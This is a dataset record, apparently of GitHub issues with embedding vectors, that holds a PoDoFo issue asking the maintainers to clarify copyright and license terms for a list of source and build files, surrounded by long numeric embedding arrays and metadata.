-0.00067825400037691, 0.010666174814105034, -0.0011794328456744552, -0.012877611443400383, -0.011025132611393929, 0.010422596707940102, -0.0216656681150198, 0.00617279252037406, 0.013460918329656124, 0.003251452697440982, -0.03284464031457901, -0.01912732422351837, 0.018076090142130852, 0.0035831681452691555, -0.008781646378338337, 0.013550657778978348, 0.014948029071092606, -0.007711183279752731, -0.020422136411070824, -0.016499239951372147, -0.0005196074489504099, 0.01062130555510521, 0.011704589240252972, 0.031895965337753296, 0.013396818190813065, 0.004855545703321695, 0.0005340299103409052, 0.023075859993696213, -0.003487018868327141, -0.014448052272200584, -0.009467512369155884, 0.0022466913796961308, -0.0020575975067913532, 0.00971109140664339, -0.0062112524174153805, -0.017947891727089882, 0.012351995334029198, -0.004544662311673164, 0.006724049337208271, 0.020319577306509018, -0.01385833602398634, -0.010903343558311462, -0.0035991931799799204, 0.0027290410362184048, -0.005958058871328831, 0.005983698647469282, -0.022896381095051765, -0.005762555170804262, 0.013396818190813065, 0.002735450863838196, 0.008044500835239887, -0.0054580820724368095, 0.003051141509786248, -0.0006778533570468426, 0.0021938092540949583, -0.006941987667232752, -0.011685359291732311, 0.014024995267391205, 0.012973761186003685, 0.009563662111759186, -0.02279382199048996, -0.007243256084620953, -0.025165507569909096, -0.005076689179986715, 0.0064804707653820515, 0.00010726669279392809, -0.025216786190867424, 0.006067028269171715, 0.007640673778951168, -0.01017901860177517, 0.003765852190554142, 0.01465317141264677, -0.01556338556110859, 0.01211482658982277, -0.002059200080111623, -0.010787964798510075, 0.010826424695551395, 0.03140880912542343, 0.016089001670479774, -0.0012154888827353716, 0.005323472898453474, 0.005813834723085165, -0.0017803666414692998, -0.017473554238677025, 0.008647037670016289, -0.03661369904875755, 0.028152549639344215, -0.03194724768400192, 0.011409730650484562, 0.014589071273803711, 0.008397049270570278, 0.013044270686805248, 0.0026809661649167538, 0.004692091606557369, 0.012268665246665478, 0.006852248217910528, -0.0058458843268454075, -0.0015383906429633498, -0.03310104086995125, -0.003871616441756487, -0.0064548309892416, -0.008768826723098755, 0.017588933929800987, -0.006499700713902712, 0.03953664004802704, 0.005765759851783514, 0.022281024605035782, 0.04007507488131523, -0.004868365358561277, -0.008647037670016289, 0.0026473139878362417, -0.017653033137321472, 0.013730136677622795, 0.013255799189209938, -0.00543564697727561, -0.010044408962130547, 0.004220959264785051, -0.0017435094341635704, -0.004281853791326284, -0.004422873258590698, -0.018140189349651337, -0.010839244350790977, 0.005256168078631163, 0.013319899328052998, 0.01606336236000061, 0.007320175413042307, 0.027742311358451843, 0.010820014402270317, -0.0005127968615852296, 0.010018768720328808, 0.005365137476474047, -0.004615171812474728, 0.014922389760613441, -0.02976785972714424, -0.011794328689575195, 0.0034549690317362547, -0.0035158635582774878, -0.0028908925596624613, 0.00668558944016695, 0.016306940466165543, -0.0033235647715628147, 0.021088771522045135, 0.010653355158865452, 0.00639393599703908, 0.0004919645143672824, 0.008679087273776531, -0.00593882892280817, -0.014153193682432175, 0.004717731382697821, 0.01703767664730549, 0.010217477567493916, 0.01749919354915619, -0.017806872725486755, 0.02048623561859131, 0.016242841258645058, -0.0009887365158647299, -0.00466965651139617, -0.0065413652919232845, -0.025639845058321953, 0.0163197610527277, 0.02817818894982338, 0.007807332556694746, -0.013999355025589466, -0.01292889192700386, 0.004047890193760395, -0.03271644189953804, 0.00714069651439786, 0.015422366559505463, -0.039126403629779816, 0.01553774531930685, 0.0010023576905950904, 0.031152410432696342, -0.01292889192700386, 0.03335743770003319, 0.009153424762189388, -0.026434678584337234, -0.014691630378365517, 0.000604138826020062, 0.005579871125519276, -0.015499286353588104, -0.006794558838009834, -0.016588978469371796, -0.009371363557875156, 0.0005772971198894083, -0.010044408962130547, 0.013383998535573483, 0.016422320157289505, 0.0013188495067879558, -0.008730366826057434, 0.004724141210317612, -0.0021825917065143585, 0.025037307292222977, -0.013653216883540154, 0.007493244484066963, 0.02506294846534729, 0.016345400363206863, 0.014986488968133926, -0.024486051872372627, 0.00011337618343532085, 0.0061567677184939384, 0.006634309887886047, 0.006291376892477274, 0.010954623110592365, -0.012653263285756111, 0.023960433900356293, -0.013742956332862377, 0.009217523969709873, 0.004019045736640692, -0.010396956466138363, -0.015358266420662403, -0.000788024568464607, -0.0034389442298561335, 0.011941757053136826, 0.011319991201162338, 0.014460871927440166, 0.009505972266197205, -0.014922389760613441, 0.0006245705881156027, 0.0076663135550916195, -0.001454259967431426, 0.000661427853628993, -0.037741851061582565, 0.0009342518169432878, -0.005323472898453474, -0.03238312155008316, -0.006845838390290737, 0.0005524585139937699, 0.007871432229876518, 0.0058875493705272675, -0.0059003690257668495, 0.016114642843604088, 0.006458035670220852, 0.031152410432696342, -0.012255845591425896, 0.004166474565863609, -0.005111943930387497, 0.012672493234276772, -0.0011273518903180957, 0.009890570305287838, 0.015883883461356163, -0.007448374759405851, 0.01947346143424511, 0.012512244284152985, 0.004858750384300947, -0.007429144810885191, 0.05820244550704956, -0.020588794723153114, 0.006147152744233608, 0.002230666344985366, 0.011441780254244804, -0.005083099007606506, -0.001317247049883008, 0.019229883328080177, 0.015742864459753036, 0.01669153943657875, -0.011339221149682999, 0.028485866263508797, 0.00845473911613226, -0.00005748933836002834, 0.010993083007633686, -0.010845653712749481, 0.01114692259579897, 0.01203149650245905, 0.0072881258092820644, -0.0008348974515683949, 0.001064854790456593, -0.01766585186123848, 0.005051049403846264, -0.0050798943266272545, 0.022986119613051414, -0.017255615442991257, -0.00041744872578419745, -0.0006109494133852422, -0.008993175812065601, -0.005230528302490711, -0.007461194880306721, -0.0001260959543287754, -0.0013116382760927081, 0.011704589240252972, -0.020588794723153114, 0.008082960732281208, -0.0032802976202219725, -0.004913235083222389, 0.012601983733475208, 0.021896427497267723, 0.006102283019572496, -0.014678810723125935, -0.0014782972866669297, 0.02017855830490589, -0.02061443403363228, -0.02089647389948368, -0.00719197653234005, -0.014499331824481487, -0.011037953197956085, -0.02111441269516945, -0.019293982535600662, 0.012851972132921219, -0.004429283086210489, -0.011461010202765465, 0.028229469433426857, 0.005980493500828743, -0.002257908694446087, 0.019524741917848587, -0.0036985476035624743, -0.010518746450543404, -0.014409592375159264, -0.0011241469765082002, 0.025934701785445213 ]
null
null
null
null
null
null
null
null
null
[ "podofo", "podofo" ]
* **I'm submitting a:** - [x] Feature request/suggestion * **[Feature request] What feature should be implemented in PoDoFo?** Please clarify license information in the following files. It's not necessary to make any commits, just tell who is a copyright holder and what license is applied for the following files. * **[Bug report/Feature request] Other information** # MISSING COPYRIGHT AND LICENSING INFORMATION The following files have no copyright and licensing information: * .editorconfig * AUTHORS.md * CHANGELOG.md * CMakeLists.txt * CODING-STYLE.md * README.md * SOURCE-LAYOUT.md * TODO.md * cmake/modules/FindLibidn.cmake * cmake/modules/LibraryDebugAndRelease.cmake * cmake_uninstall.cmake.in * src/podofo/CMakeLists.txt * src/podofo/auxiliary/EnumFlags.h * src/podofo/auxiliary/Version.h * src/podofo/auxiliary/baseincludes.h * src/podofo/auxiliary/span.h * src/podofo/libpodofo.pc.in * src/podofo/podofo_config.h.in * src/podofo/private/CMakeLists.txt * src/podofo/private/FileSystem.h * src/podofo/private/Format.h * src/podofo/private/JpegCommon.cpp * src/podofo/private/JpegCommon.h * src/podofo/private/WindowsLeanMean.h * src/podofo/private/XMPNotes.txt * src/podofo/private/charconv_compat.h * src/podofo/private/chrono_compat.h * src/podofo/private/format_compat.h * src/podofo/private/numbers_compat.h * src/podofo/private/utfcpp_extensions.h The following files have no licensing information: * cmake/modules/MacroEnsureVersion.cmake * src/podofo/auxiliary/span.hpp * src/podofo/podofo.rc * src/podofo/private/PdfStandard14FontFiles.cpp * src/podofo/private/istringviewstream.h * src/podofo/private/outstringstream.h
Please clarify license information for the following files
https://api.github.com/repos/podofo/podofo/issues/145/comments
3
2024-03-13T07:58:56
2024-03-16T12:56:37Z
https://github.com/podofo/podofo/issues/145
2,183,345,435
145
false
This is a GitHub Issue repo:podofo owner:podofo Title : Please clarify license information for the following files Issue date: --- start body --- * **I'm submitting a:** - [x] Feature request/suggestion * **[Feature request] What feature should be implemented in PoDoFo?** Please clarify license information in the following files. It's not necessary to make any commits, just tell who is a copyright holder and what license is applied for the following files. * **[Bug report/Feature request] Other information** # MISSING COPYRIGHT AND LICENSING INFORMATION The following files have no copyright and licensing information: * .editorconfig * AUTHORS.md * CHANGELOG.md * CMakeLists.txt * CODING-STYLE.md * README.md * SOURCE-LAYOUT.md * TODO.md * cmake/modules/FindLibidn.cmake * cmake/modules/LibraryDebugAndRelease.cmake * cmake_uninstall.cmake.in * src/podofo/CMakeLists.txt * src/podofo/auxiliary/EnumFlags.h * src/podofo/auxiliary/Version.h * src/podofo/auxiliary/baseincludes.h * src/podofo/auxiliary/span.h * src/podofo/libpodofo.pc.in * src/podofo/podofo_config.h.in * src/podofo/private/CMakeLists.txt * src/podofo/private/FileSystem.h * src/podofo/private/Format.h * src/podofo/private/JpegCommon.cpp * src/podofo/private/JpegCommon.h * src/podofo/private/WindowsLeanMean.h * src/podofo/private/XMPNotes.txt * src/podofo/private/charconv_compat.h * src/podofo/private/chrono_compat.h * src/podofo/private/format_compat.h * src/podofo/private/numbers_compat.h * src/podofo/private/utfcpp_extensions.h The following files have no licensing information: * cmake/modules/MacroEnsureVersion.cmake * src/podofo/auxiliary/span.hpp * src/podofo/podofo.rc * src/podofo/private/PdfStandard14FontFiles.cpp * src/podofo/private/istringviewstream.h * src/podofo/private/outstringstream.h --- end body ---
1,952
[ -0.046604517847299576, 0.00839771144092083, -0.018867043778300285, 0.009523894637823105, 0.03353523090481758, 0.012874636799097061, -0.012985864654183388, 0.017907701432704926, -0.03161654993891716, 0.045686885714530945, -0.003395928768441081, -0.010128696449100971, 0.016336606815457344, 0.00033976667327806354, -0.026096859946846962, -0.010747401975095272, -0.021494803950190544, -0.02224559336900711, -0.003355956170707941, -0.01616976596415043, -0.01813015714287758, 0.003029223997145891, 0.053723108023405075, 0.026263702660799026, 0.029308568686246872, 0.009808915667235851, 0.00010932709119515494, -0.0023722839541733265, -0.007924992591142654, -0.007087306585162878, 0.04290618747472763, 0.020271295681595802, -0.02161993458867073, -0.02031300589442253, 0.026305412873625755, 0.00807793065905571, 0.024136468768119812, 0.025248747318983078, 0.02683374658226967, 0.014584766700863838, -0.006343469955027103, -0.051109250634908676, 0.02517922967672348, -0.000694305810611695, -0.05169319733977318, 0.00038060819497331977, 0.008251724764704704, 0.035453911870718, -0.02677813172340393, -0.010504091158509254, 0.0020264345221221447, -0.02772356942296028, -0.01437621470540762, -0.044769253581762314, 0.018519455567002296, -0.02066059410572052, 0.0023027663119137287, -0.013117947615683079, -0.00950999092310667, 0.01974296383559704, -0.04045917093753815, 0.024080853909254074, 0.0007768577779643238, 0.021091602742671967, -0.0015876053366810083, 0.020507656037807465, -0.0329790897667408, 0.04643767327070236, -0.015697047114372253, -0.007827667519450188, 0.011505142785608768, 0.0329790897667408, 0.023830590769648552, 0.024470152333378792, 0.012638277374207973, -0.03395233675837517, 0.020271295681595802, -0.02160603180527687, 0.018283097073435783, 0.023413486778736115, -0.0248455461114645, 0.008661877363920212, -0.03912443667650223, 0.005092155188322067, 0.002453966997563839, 0.008279531262814999, -0.026736421510577202, -0.05833906680345535, -0.01938147284090519, -0.01906169205904007, 0.015154809691011906, 0.015613625757396221, 0.016030730679631233, -0.01970125362277031, 0.027904314920306206, -0.03183900564908981, 0.03250637277960777, -0.027000587433576584, -0.027848701924085617, -0.05872836336493492, -0.003993778955191374, -0.0025460775941610336, -0.0329790897667408, -0.00020790070993825793, 0.022760022431612015, 0.019492700695991516, 0.046632323414087296, -0.03125505894422531, 0.0020976897794753313, 0.09048394858837128, 0.027612341567873955, 0.030837953090667725, -0.00885652657598257, 0.01872800849378109, -0.006548546254634857, 0.010017468594014645, 0.03300689905881882, -0.017587922513484955, 0.007945847697556019, -0.027862604707479477, -0.011720646172761917, -0.06912817806005478, 0.011428672820329666, 0.0025704086292535067, -0.06968431919813156, 0.02358032763004303, -0.000941961829084903, -0.022370724007487297, 0.02586050145328045, 0.015349458903074265, -0.0543348602950573, -0.0035506051499396563, -0.0005226845387369394, -0.01744888722896576, -0.0026955401990562677, 0.009920143522322178, -0.01840822771191597, 0.06351117044687271, -0.01618366874754429, 0.01372275035828352, -0.01386178471148014, -0.035092420876026154, 0.02159212902188301, -0.00434484239667654, -0.028974885120987892, -0.016002923250198364, -0.008641022257506847, 0.021105505526065826, 0.006645870860666037, 0.023330064490437508, -0.013979964889585972, -0.0328400544822216, 0.028154578059911728, -0.000016917729226406664, 0.04059820622205734, -0.006830092053860426, -0.006479029078036547, 0.013444679789245129, -0.01160941831767559, -0.013646280393004417, -0.002924947766587138, -0.016725905239582062, 0.038901980966329575, -0.03575979173183441, -0.005126914009451866, -0.0274594034999609, -0.024942871183156967, 0.04607618227601051, -0.03069891780614853, 0.014098144136369228, -0.013847880996763706, 0.010636174120008945, 0.04076504707336426, -0.039875224232673645, -0.037984348833560944, -0.004191903863102198, 0.018519455567002296, 0.02775137685239315, -0.02905830554664135, -0.04120996221899986, 0.023010285571217537, 0.010789112187922001, 0.04154364392161369, -0.027904314920306206, 0.003604481229558587, -0.02619418501853943, 0.04718846455216408, 0.0032829628325998783, -0.01516871340572834, 0.016572967171669006, -0.00018107130017597228, 0.012436676770448685, 0.008835671469569206, -0.03256198763847351, 0.06573572754859924, -0.02481773868203163, -0.010093937627971172, -0.02772356942296028, -0.0035905777476727962, -0.008001461625099182, -0.012638277374207973, 0.03161654993891716, -0.010935098864138126, 0.00855760183185339, 0.030754532665014267, 0.024915063753724098, -0.011623322032392025, 0.02544339746236801, -0.00934314914047718, 0.0034428529907017946, -0.010726546868681908, -0.0016536469338461757, 0.020785724744200706, 0.008349048905074596, -0.02459528297185898, 0.005999358370900154, 0.004563822411000729, -0.02096647024154663, 0.001759661128744483, -0.003913833759725094, 0.0019708203617483377, -0.0400976799428463, -0.018825333565473557, -0.0052311900071799755, -0.053389422595500946, 0.009238872677087784, -0.007202010601758957, 0.03322935476899147, 0.004080676008015871, 0.029586637392640114, 0.0543348602950573, -0.007980606518685818, -0.037928733974695206, -0.007987557910382748, 0.010135647840797901, 0.015585818327963352, -0.0184499379247427, -0.022148268297314644, 0.00637475261464715, 0.011296589858829975, 0.008084882982075214, 0.022676600143313408, -0.014807222411036491, -0.020577173680067062, -0.012568759731948376, 0.018797526136040688, -0.006659774109721184, 0.023983528837561607, -0.007890233770012856, 0.03817899897694588, 0.02645835094153881, 0.004174524452537298, 0.02456747554242611, 0.005095630884170532, -0.012381062842905521, 0.0228851530700922, 0.03934689238667488, 0.03962496295571327, -0.00612796563655138, -0.0030813622288405895, 0.024664800614118576, 0.026277605444192886, -0.024928966537117958, 0.028863657265901566, -0.04196074977517128, -0.002700753975659609, 0.016656387597322464, -0.01242277305573225, -0.030142778530716896, -0.029280761256814003, 0.058561522513628006, 0.0018161440966650844, -0.00020116619998589158, 0.04946863651275635, -0.047939252108335495, 0.029141725972294807, 0.03589882329106331, 0.012825974263250828, 0.03581540286540985, 0.006187055259943008, -0.031755585223436356, -0.006649346556514502, 0.03450847417116165, 0.004817561246454716, -0.0073132384568452835, -0.010198214091360569, -0.018519455567002296, -0.038596104830503464, -0.010392862372100353, 0.010344200767576694, -0.008043171837925911, 0.012624373659491539, -0.024915063753724098, -0.01578046754002571, -0.0177964735776186, -0.012464483268558979, 0.0075982604175806046, -0.031088216230273247, -0.040876276791095734, 0.00702821696177125, -0.03614908829331398, -0.03064330294728279, -0.013152706436812878, 0.013750556856393814, 0.001784861204214394, -0.005825564730912447, 0.004615960642695427, 0.05978503078222275, -0.00971159152686596, -0.04443557187914848, -0.033729881048202515, -0.02618028223514557, -0.005752571392804384, -0.023177126422524452, 0.005749095231294632, 0.003326411359012127, -0.012193365022540092, -0.03250637277960777, 0.026027344167232513, -0.03651057928800583, -0.03940250724554062, -0.00620791083201766, -0.03517584502696991, -0.0020994278602302074, 0.0031265486031770706, -0.04657670855522156, 0.003649667603895068, 0.01904778927564621, -0.0222316887229681, 0.006958699319511652, -0.015544108115136623, 0.016934458166360855, 0.013229175470769405, -0.015766562893986702, 0.03720575198531151, -0.03033742681145668, -0.01548849418759346, 0.020896954461932182, 0.009537797421216965, -0.018296999856829643, 0.00124957668595016, -0.007132492959499359, -0.04994135722517967, -0.003673998638987541, 0.007813764736056328, -0.07018484175205231, 0.004654195159673691, 0.056031085550785065, 0.015571914613246918, 0.012332400307059288, 0.0008098786347545683, -0.011560756713151932, -0.004633340053260326, 0.020410330966114998, 0.01111584436148405, 0.0010436311131343246, -0.018561165779829025, -0.046326447278261185, 0.024080853909254074, 0.02028520032763481, -0.017824281007051468, -0.05233275517821312, -0.00852284301072359, 0.005957647692412138, 0.004876650869846344, 0.03423040732741356, -0.027181332930922508, -0.0022871249821037054, 0.022426338866353035, -0.031477514654397964, -0.017991123721003532, 0.008606263436377048, -0.04254469648003578, -0.006030641030520201, -0.03033742681145668, 0.022106558084487915, -0.001551108667626977, 0.05388994887471199, -0.03131067007780075, 0.013743605464696884, 0.011004616506397724, 0.005947220139205456, 0.052138108760118484, -0.01128268614411354, -0.008717491291463375, -0.006437318399548531, -0.018644588068127632, 0.028863657265901566, 0.007709488272666931, -0.0164200272411108, -0.02358032763004303, 0.06623625010251999, 0.02812677063047886, -0.07635799795389175, -0.0444633774459362, 0.04337890446186066, -0.00005664588024956174, -0.03231172263622284, 0.01771305315196514, -0.00003638805355876684, 0.02067449688911438, -0.05358407273888588, 0.01439011748880148, 0.008356000296771526, 0.007646922487765551, 0.031199444085359573, 0.013312596827745438, -0.012707795016467571, 0.015029678121209145, 0.006013261619955301, -0.026055149734020233, 0.01704568602144718, -0.00598545465618372, 0.024984581395983696, 0.028224095702171326, 0.027806991711258888, -0.008126593194901943, 0.04173829406499863, 0.0088982367888093, 0.01836651749908924, 0.029864707961678505, -0.032117076218128204, -0.012923299334943295, 0.005950695835053921, 0.03264540806412697, 0.006875278428196907, 0.002071620896458626, 0.0038199853152036667, 0.0470772348344326, -0.02131405845284462, -0.03030961938202381, 0.019603928551077843, 0.029836900532245636, -0.003687902120873332, 0.006451221648603678, -0.017907701432704926, -0.020563269034028053, -0.0035280119627714157, 0.0025269603356719017, 0.030810145661234856, -0.032144881784915924, 0.030559882521629333, -0.002017744816839695, -0.0067014847882092, -0.0017066540895029902, -0.044046271592378616, -0.041432417929172516, -0.0038651716895401478, -0.05525249242782593, -0.029586637392640114, 0.033729881048202515, 0.01708739623427391, -0.025582430884242058, -0.014362310990691185, -0.003924261778593063, 0.007459225133061409, -0.030448654666543007, -0.007042120210826397, 0.03876294568181038, -0.016350511461496353, -0.00004507774065132253, 0.021842392161488533, -0.020132262259721756, -0.007528742775321007, -0.010434573516249657, 0.014779415912926197, 0.007535694632679224, -0.0483841635286808, 0.01196395792067051, 0.015405072830617428, -0.010156502947211266, 0.032784443348646164, 0.03926347196102142, -0.006242669653147459, 0.0033090319484472275, 0.020104454830288887, 0.005151245277374983, -0.031783390790224075, 0.007834619842469692, -0.03183900564908981, 0.012999768368899822, -0.05639257654547691, -0.0183804202824831, 0.005335466470569372, -0.002146352082490921, -0.027862604707479477, -0.010406766086816788, 0.00950999092310667, 0.008321242406964302, 0.015474590472877026, -0.003781750798225403, 0.02423379197716713, -0.004066772293299437, 0.00718810735270381, 0.013521148823201656, 0.027014492079615593, -0.009447424672544003, -0.050858985632658005, 0.07135273516178131, 0.00873139500617981, -0.017546210438013077, -0.004605532623827457, -0.0009063340839929879, -0.024609187617897987, 0.053472843021154404, 0.007619115523993969, -0.037900928407907486, -0.005206859204918146, -0.02975348010659218, 0.03578759729862213, 0.022773925215005875, 0.01712910644710064, -0.0012408869806677103, -0.03609347343444824, -0.007403611205518246, -0.0037852267269045115, -0.02975348010659218, -0.026680808514356613, 0.008919091895222664, 0.010684836655855179, -0.01971515640616417, -0.014251083135604858, 0.014334503561258316, 0.033396195620298386, -0.01128268614411354, 0.0009280583471991122, -0.009280582889914513, 0.0036705227103084326, 0.02908611297607422, -0.03172777593135834, -0.01148428674787283, 0.007487032096832991, 0.0014807222178205848, 0.00725762452930212, -0.017657438293099403, 0.024039143696427345, 0.0004396980511955917, -0.0017970268381759524, -0.0010497139301151037, -0.003663571085780859, -0.013027574867010117, 0.025248747318983078, -0.02066059410572052, -0.004880127031356096, -0.013187465257942677, -0.011164506897330284, -0.04638206213712692, 0.007716440130025148, 0.030170584097504616, -0.015877792611718178, -0.012992816045880318, -0.0025113187730312347, 0.005644819233566523, 0.005074775777757168, -0.011915295384824276, 0.011512094177305698, -0.013813123106956482, 0.015655335038900375, 0.018588973209261894, -0.013368210755288601, 0.01016345527023077, 0.016211476176977158, 0.0006087124347686768, 0.014598670415580273, -0.00725762452930212, -0.019214630126953125, 0.002700753975659609, 0.014278889633715153, -0.013229175470769405, -0.01676761545240879, 0.041432417929172516, 0.007549597881734371, 0.03484215959906578, 0.026611290872097015, 0.015071389265358448, 0.0007798991864547133, -0.004094579257071018, 0.018658490851521492, -0.03161654993891716, -0.02583269402384758, 0.013486390933394432, 0.011234024539589882, -0.012819022871553898, 0.0012182937934994698, 0.02195362001657486, -0.011039375327527523, 0.005752571392804384, -0.016698097810149193, 0.009808915667235851, -0.014487442560493946, 0.016280993819236755, 0.03926347196102142, 0.005665674339979887, 0.01148428674787283, 0.04563127085566521, -0.00062478834297508, 0.012561808340251446, 0.001809192355722189, 0.020771821960806847, -0.006419938988983631, 0.002002103254199028, 0.04412969574332237, 0.025429492816329002, 0.006221814081072807, -0.027681859210133553, 0.011741502210497856, 0.005436266772449017, -0.020410330966114998, 0.0006925678462721407, -0.0024105184711515903, 0.011296589858829975, 0.007577404845505953, 0.023788880556821823, 0.010622270405292511, 0.02969786711037159, -0.016280993819236755, 0.010031372308731079, 0.015015775337815285, -0.014960161410272121, 0.013840929605066776, -0.025276554748415947, -0.01181101892143488, -0.0038408406544476748, 0.020771821960806847, 0.023413486778736115, 0.0414046086370945, 0.0025200084783136845, -0.004473449662327766, -0.0013077975017949939, -0.008286483585834503, -0.020201778039336205, -0.00249915337190032, -0.006903085391968489, -0.008543698117136955, -0.03609347343444824, 0.021411383524537086, 0.007024741265922785, 0.011185362003743649, -0.015140906907618046, -0.015558010898530483, -0.0025200084783136845, -0.0021585177164524794, -0.02070230431854725, 0.08358781784772873, -0.025373879820108414, 0.01213775109499693, -0.002031648298725486, -0.0016432193806394935, 0.03881856054067612, 0.021731162443757057, -0.02707010507583618, -0.0067014847882092, -0.03189461678266525, 0.015391169115900993, 0.0009454376995563507, 0.003573198337107897, -0.005387604236602783, 0.03364646062254906, 0.0012426249450072646, -0.023149318993091583, 0.01651735231280327, -0.008717491291463375, 0.01291634701192379, 0.004157145041972399, 0.013145755045115948, -0.002775485161691904, -0.03389672189950943, -0.003927737474441528, 0.018255289644002914, 0.0026694710832089186, 0.017865991219878197, -0.004320511128753424, 0.013528101146221161, -0.022718312218785286, -0.02773747406899929, -0.012318496592342854, 0.018825333565473557, -0.026055149734020233, -0.029948128387331963, -0.024164274334907532, 0.007737295236438513, -0.003291652537882328, 0.0041050068102777, -0.023038091138005257, -0.03548172116279602, 0.03701110556721687, 0.00307267252355814, -0.020910857245326042, -0.010156502947211266, -0.02296857349574566, 0.01836651749908924, -0.02975348010659218, -0.017003975808620453, -0.0021341864485293627, 0.0007838095771148801, -0.029197340831160545, 0.011206217110157013, 0.020855242386460304, -0.017893798649311066, 0.024970678612589836, -0.02517922967672348, 0.0068961335346102715, -0.014932353980839252, 0.016851035878062248, -0.021147215738892555, -0.0014876739587634802, 0.01906169205904007, 0.011546852998435497, -0.025081906467676163, 0.006159248296171427, -0.017671342939138412, 0.020187875255942345, -0.008474180474877357, 0.0004218841786496341, -0.015613625757396221, -0.026944974437355995, 0.02652786858379841, -0.002453966997563839, -0.03809557855129242, -0.00021039898274466395, -0.03575979173183441, -0.02390010841190815, -0.042739346623420715, -0.02708400972187519, 0.007528742775321007, 0.006857899017632008, -0.035036809742450714, -0.011289638467133045, 0.02517922967672348, 0.010177358984947205, -0.02289905771613121, 0.01871410571038723, -0.00245918077416718, 0.019548313692212105, -0.025957826524972916, -0.006951747927814722, 0.021453093737363815, -0.015877792611718178, -0.0025999536737799644, 0.010608366690576077, 0.002360118320211768, -0.00033585631172172725, -0.02004883997142315, -0.007876330055296421, 0.004869699478149414, -0.0012704319087788463, 0.007876330055296421, 0.02451186254620552, -0.026722518727183342, 0.006298283580690622, 0.011574659496545792, -0.023163223639130592, -0.012659132480621338, -0.04835635796189308, 0.03904101625084877, -0.007327142171561718, 0.0015345982974395156, -0.014118999242782593, 0.011011567898094654, -0.0018074543913826346, -0.022801732644438744, 0.019617831334471703, -0.022092653438448906, 0.020883049815893173, 0.01704568602144718, -0.0068961335346102715, 0.020104454830288887, 0.0006569401593878865, 0.0014729015529155731, -0.01196395792067051, 0.025568528100848198, 0.005550970323383808, -0.020771821960806847, -0.000024100298105622642, 0.013813123106956482, -0.005387604236602783, 0.007987557910382748, -0.028293613344430923, 0.018922656774520874, 0.03912443667650223, -0.017518404871225357, 0.001660598674789071, -0.03253417834639549, 0.004073724150657654, 0.04171048477292061, -0.017184719443321228, 0.014084240421652794, 0.010670932941138744, -0.026319317519664764, -0.00327079719863832, 0.0400976799428463, -0.017226431518793106, 0.05266644060611725, -0.030170584097504616, 0.013256982900202274, -0.024678705260157585, -0.02677813172340393, 0.036649614572525024, -0.026541773229837418, 0.011025471612811089, 0.010274683125317097, 0.010156502947211266, 0.0241920817643404, -0.02068840153515339, 0.011498190462589264, 0.01579437032341957, -0.01049018744379282, 0.04026452451944351, -0.024386730045080185, 0.0055231633596122265, -0.019464893266558647, 0.0026851126458495855, 0.0008342097280547023, 0.032144881784915924, -0.009753301739692688, -0.01032334566116333, 0.015989020466804504, -0.014292793348431587, 0.020201778039336205, 0.03801215812563896, -0.027223043143749237, -0.016948360949754715, 0.024636993184685707, -0.022148268297314644, -0.012839877977967262, -0.01682323031127453, -0.03909662738442421, -0.0032308248337358236, 0.03292347863316536, 0.034981194883584976, 0.01115060318261385, 0.0003039217262994498, -0.006322614382952452, -0.014195469208061695, -0.009308390319347382, 0.011039375327527523, -0.007660825736820698, 0.012235076166689396, -0.007087306585162878, 0.041182152926921844, -0.02709791250526905, -0.004299656022340059, -0.0425725020468235, -0.004800181835889816, 0.015738757327198982, -0.018199674785137177, -0.014042530208826065, -0.026013439521193504, -0.008877381682395935, 0.0164895448833704, 0.05024723336100578, -0.00310395541600883, -0.005804709158837795, 0.03475873917341232, -0.0024904636666178703, 0.0045186360366642475, -0.027904314920306206, 0.006336518097668886, 0.017907701432704926, -0.00030609415262006223, 0.027264755219221115, 0.019937612116336823, 0.0002745940291788429, -0.006353897508233786, 0.015432880260050297, -0.01675371266901493, -0.0071811554953455925, -0.027834797278046608, 0.006558973807841539, -0.008668829686939716, -0.02255146950483322, -0.008946899324655533, 0.03423040732741356, -0.005481453146785498, -0.03450847417116165, 0.008105738088488579, -0.00901641696691513, 0.0008889547316357493, 0.04716065526008606, 0.019854191690683365, -0.02577708102762699, 0.00362881226465106, 0.00004746740160044283, -0.020799629390239716, 0.018644588068127632, -0.05102582648396492, -0.0016023778589442372, 0.005272900685667992, -0.012033475562930107, -0.023955723270773888, 0.01468209084123373, 0.02128625102341175, -0.0014033840270712972, -0.007619115523993969, 0.027973832562565804, 0.04971889778971672, 0.007466176990419626, -0.0328400544822216, -0.011122796684503555, -0.010156502947211266, -0.023955723270773888, 0.01193615049123764, 0.017240334302186966, -0.005276376381516457, 0.004320511128753424, -0.006969126872718334, 0.04415750131011009, -0.00950999092310667, 0.02066059410572052, -0.009294486604630947, -0.012283737771213055, -0.02291296049952507, -0.008272579871118069, 0.005050444509834051, -0.02490116097033024, 0.02683374658226967, -0.011574659496545792, 0.013486390933394432, -0.0002737250761128962, 0.049246180802583694, -0.03673303499817848, 0.03094918094575405, -0.016628580167889595, 0.01651735231280327, 0.013229175470769405, -0.023093705996870995, 0.0012678250204771757, 0.03550952672958374, 0.008043171837925911, -0.011094989255070686, -0.004862747620791197, -0.020799629390239716, -0.015571914613246918, -0.004125862382352352, 0.01401472371071577, -0.018811428919434547, 0.0005374570027925074, 0.014654284343123436, -0.01878362149000168, -0.02028520032763481, 0.013006719760596752, -0.008773105219006538, 0.02004883997142315, -0.02289905771613121, -0.003136976156383753, 0.022398531436920166, 0.013027574867010117, -0.024414537474513054, -0.012054330669343472, -0.02100818231701851, 0.009315341711044312, -0.004994830582290888, -0.020090550184249878, -0.004841892048716545, -0.0016797160496935248, 0.03250637277960777, -0.02192581258714199, 0.00451168417930603, 0.025026291608810425, 0.01584998518228531, -0.006628491450101137, 0.00937790796160698, 0.020118357613682747, -0.01744888722896576, -0.011449528858065605, 0.013903495855629444, -0.018867043778300285, 0.010441524907946587, -0.00645469781011343, -0.008939947932958603, 0.017615728080272675, -0.011393914930522442, -0.009718542918562889, 0.025234844535589218, -0.017309851944446564, 0.0071811554953455925, -0.0022610558662563562, -0.006725816056132317, -0.005377176683396101, -0.022384626790881157, -0.028140675276517868, -0.01775476336479187, 0.01257571205496788, -0.0196873489767313, 0.0235386174172163, -0.03236733749508858, -0.010226020589470863, 0.023399582132697105, -0.016350511461496353, 0.020521558821201324, 0.03626031428575516, 0.00852979440242052, 0.008842622861266136, -0.009092886000871658, 0.02522093988955021, -0.004490829072892666, 0.015724852681159973, -0.01740717701613903, -0.017017878592014313, -0.030782338231801987, -0.03656619414687157, 0.02167554944753647, 0.001233935239724815, -0.009607315063476562, 0.005769950803369284, 0.025651948526501656, 0.002815457759425044, 0.0031404520850628614, -0.010107841342687607, 0.013833978213369846, 